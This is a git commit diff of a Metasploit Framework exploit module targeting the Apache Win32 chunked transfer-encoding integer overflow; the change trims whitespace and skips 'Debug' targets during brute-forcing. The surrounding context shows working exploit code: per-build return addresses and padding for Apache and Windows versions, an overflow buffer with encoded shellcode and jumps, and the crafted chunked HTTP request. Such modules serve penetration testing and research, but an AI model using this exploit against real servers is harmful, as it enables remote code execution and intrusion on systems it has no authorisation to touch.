Skip the debugging target for automatic mode
git-svn-id: file:///home/svn/framework3/trunk@8499 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
5d7139ad6f
commit
32357b1f64
|
@ -3,7 +3,7 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Apache Win32 Chunked Encoding',
|
||||
'Description' => %q{
|
||||
This module exploits the chunked transfer integer wrap
|
||||
|
@ -55,24 +55,24 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
|
||||
|
||||
},
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows Generic Bruteforce', {} ],
|
||||
|
||||
# Official Apache.org win32 builds
|
||||
[ 'Apache.org Build 1.3.9->1.3.19',
|
||||
[ 'Apache.org Build 1.3.9->1.3.19',
|
||||
{
|
||||
'Ret' => 0x00401151,
|
||||
'Ret' => 0x00401151,
|
||||
'Pad' => [6,2,0,4,1,3,5,7]
|
||||
}
|
||||
],
|
||||
[ 'Apache.org Build 1.3.22->1.3.24',
|
||||
[ 'Apache.org Build 1.3.22->1.3.24',
|
||||
{
|
||||
'Ret' => 0x00401141,
|
||||
'Ret' => 0x00401141,
|
||||
'Pad' => [2,6,0,4,1,3,5,7]
|
||||
}
|
||||
],
|
||||
[ 'Apache.org Build 1.3.19->1.3.24',
|
||||
[ 'Apache.org Build 1.3.19->1.3.24',
|
||||
{
|
||||
'Ret' => 0x6ff6548d,
|
||||
'Pad' => [2,6,0,4,1,3,5,7]
|
||||
|
@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}
|
||||
],
|
||||
|
||||
# Pop/Pop/Return on Windows 2000
|
||||
# Pop/Pop/Return on Windows 2000
|
||||
[ 'Windows 2000 English',
|
||||
{
|
||||
'Ret' => 0x75022ac4,
|
||||
|
@ -165,7 +165,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
if response.nil?
|
||||
print_status("No response to request")
|
||||
return Exploit::CheckCode::Safe
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
code = Exploit::CheckCode::Appears
|
||||
|
@ -198,6 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
if target_index == 0
|
||||
targets.each_with_index { |targ, idx|
|
||||
next if idx == 0
|
||||
next if targ.name =~ /Debug/
|
||||
|
||||
exploit_target(targ)
|
||||
}
|
||||
|
@ -208,9 +209,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def exploit_target(target)
|
||||
target['Pad'].each { |pad|
|
||||
pattern =
|
||||
rand_text_alphanumeric(3936) +
|
||||
payload.encoded +
|
||||
pattern =
|
||||
rand_text_alphanumeric(3936) +
|
||||
payload.encoded +
|
||||
make_nops(6) + "\xe9" + [-900].pack('V') + "pP" +
|
||||
rand_text_alphanumeric(pad)
|
||||
|
||||
|
@ -237,13 +238,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# v | v | v v | | v v | | v v |
|
||||
# [shellcode] [jmp -949] [pad] [jmp -16] [ret] [jmp -8] [ret] [jmp -8] [ret]
|
||||
#
|
||||
|
||||
|
||||
print_status("Trying #{target.name} [ #{"0x%.8x" % target.ret}/#{pad} ]")
|
||||
|
||||
# Build the request
|
||||
send_request_raw({
|
||||
'uri' => '/',
|
||||
'headers' =>
|
||||
'headers' =>
|
||||
{
|
||||
'Transfer-Encoding' => "CHUNKED"
|
||||
},
|
||||
|
@ -256,3 +257,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue